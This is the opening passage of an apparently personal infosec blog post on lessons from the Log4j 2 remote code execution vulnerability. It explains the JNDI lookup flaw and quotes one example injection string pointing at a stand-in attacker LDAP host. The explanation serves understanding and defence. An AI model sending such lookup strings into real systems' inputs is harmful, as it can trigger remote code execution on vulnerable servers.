Az

infosec

Log4j Learnings

Sat, Dec 25, 2021 | 800 Words

A few weeks ago a new vulnerability was discovered being expoited in the wild. Vulnerability Summary The Apache Log4j 2 library has a Remote Code Execution (RCE) vulnerability based on variable substition. If a log message contains a string with a JNDI string pointing to an LDAP or RMI endpoint such as ${jndi:ldap://evil-ldap.example.com/mwahaha} the Log4j library will immediately try and resolve it by calling out to the endpoint. In the LDAP case it will resolve the LDAP resource and if the LDAP server replies with a HTTP address it will call out to that as well.